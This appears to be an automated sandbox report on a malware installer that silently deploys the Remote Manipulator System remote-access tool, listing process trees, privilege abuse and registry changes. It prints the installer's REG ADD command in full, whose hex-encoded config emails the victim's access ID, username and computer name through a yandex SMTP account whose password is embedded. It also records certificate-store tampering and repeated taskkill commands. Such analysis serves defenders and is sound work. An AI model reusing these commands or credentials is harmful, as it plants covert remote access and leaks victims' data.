Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	rutserv.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmprutserv.exerutserv.exe

pid	process
1312	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
1312	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exerutserv.exesvchost.exetaskkill.exetaskkill.exetaskkill.exerutserv.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	804	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	3772	rutserv.exe
Token: SeDebugPrivilege	3772	rutserv.exe
Token: SeTcbPrivilege	3676	svchost.exe
Token: SeTcbPrivilege	3676	svchost.exe
Token: SeDebugPrivilege	728	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeTakeOwnershipPrivilege	2448	rutserv.exe
Token: SeTcbPrivilege	2448	rutserv.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeTcbPrivilege	2448	rutserv.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	3912	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	3500	taskkill.exe
Token: SeDebugPrivilege	1100	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	3500	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	3700	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3932	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	196	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3244	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	4080	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp

pid process

1312 5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

rutserv.exerutserv.exe

pid process

3772 rutserv.exe
3772 rutserv.exe
3772 rutserv.exe
3772 rutserv.exe
2448 rutserv.exe
2448 rutserv.exe
2448 rutserv.exe
2448 rutserv.exe

pid	process
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
3772	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe
2448	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmpcmd.exesvchost.exe

description	pid	process	target process
PID 1736 wrote to memory of 1312	1736	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 1736 wrote to memory of 1312	1736	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 1736 wrote to memory of 1312	1736	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 1312 wrote to memory of 1384	1312	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp	cmd.exe
PID 1312 wrote to memory of 1384	1312	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp	cmd.exe
PID 1384 wrote to memory of 2412	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 2412	1384	cmd.exe	reg.exe
PID 1384 wrote to memory of 2480	1384	cmd.exe	timeout.exe
PID 1384 wrote to memory of 2480	1384	cmd.exe	timeout.exe
PID 1384 wrote to memory of 3772	1384	cmd.exe	rutserv.exe
PID 1384 wrote to memory of 3772	1384	cmd.exe	rutserv.exe
PID 1384 wrote to memory of 3772	1384	cmd.exe	rutserv.exe
PID 1384 wrote to memory of 804	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 804	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2336	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2336	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 728	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 728	1384	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 2448	3676	svchost.exe	rutserv.exe
PID 3676 wrote to memory of 2448	3676	svchost.exe	rutserv.exe
PID 3676 wrote to memory of 2448	3676	svchost.exe	rutserv.exe
PID 1384 wrote to memory of 2648	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2648	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1044	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1044	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1360	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1360	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1904	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1904	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2236	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2236	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3912	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3912	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1692	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1692	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2236	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2236	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1824	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1824	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1100	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1100	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3064	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3064	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3500	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3500	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1100	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1100	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1692	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1692	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3176	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3176	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3500	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3500	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1904	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1904	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3048	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3048	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1568	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 1568	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3700	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3700	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3736	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 3736	1384	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 2180	1384	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe
"C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Users\Admin\AppData\Local\Temp\is-N30TL.tmp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N30TL.tmp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp" /SL5="$40050,6385183,780800,C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
3⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46383041413939302d414432332d343543432d423131352d4439383834443532373335387d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e747275653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e776577626f6f6c4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e20496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2671756f743be2968220e2968320e2968420e2968520e29686e298a354686520636f6d7075746572e298a3e2968620e2968520e2968420e2968320e2968220202671756f743b2c2c2671756f743b49443a20254944252671756f743b2c2671756f743b557365726e616d653a2025555345524e414d45252671756f743b2c2671756f743b436f6d7075746572206e616d653a2025434f4d504e414d45252671756f743b2c2671756f743b5468652075736572207761732070726573656e7465642061733a202553454c464944252671756f743b3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
4⤵
PID:2412

C:\Windows\system32\timeout.exe
TIMEOUT /T 3
4⤵
- Delays execution with timeout.exe
PID:2480

C:\ProgramData\Immunity\rutserv.exe
"C:\ProgramData\Immunity\rutserv.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3772

C:\ProgramData\Immunity\rutserv.exe
C:\ProgramData\Immunity\rutserv.exe -run_agent -second
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:804

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:728

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1904

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3912

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1100

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3500

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3736

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1624

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:196

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:2336

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1704

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3064

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:196

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2760

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3848

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1296

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1692

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:728

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2624

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1100

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1352

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1684

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3904

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3968

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:3500

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1204

